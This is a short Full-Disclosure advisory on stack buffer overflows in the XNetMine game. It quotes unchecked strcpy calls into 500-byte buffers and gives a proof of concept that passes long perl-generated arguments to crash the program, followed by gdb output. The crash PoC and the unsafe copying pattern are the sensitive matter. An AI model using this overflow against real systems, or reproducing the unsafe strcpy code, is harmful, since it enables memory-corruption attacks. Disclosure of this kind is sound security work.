//
Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz
*Vulnerable code:*
--
line: 672/676
if (strncmp("-PortNumber",argv[t+1],11)==0)
{ char text[500];
strcpy(text,argv[t+1]);
strcpy(Port,&text[11]);
}
--
line: 677/682
if (strncmp("-Name",argv[t+1],5)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(User,&text[5]);
}
--
line: 683/688
if (strncmp("-ServerName",argv[t+1],11)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(ServerName,&text[11]);
}
--
*Proof of concept:*
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print
"A"x504'`
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e
'print "A"x504'`
Server:1 Client:0 PortNum:31337
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
--
*Debug information:*
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()
-- federico
federico@plugs.it / http://defsol.plugs.it/
//
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
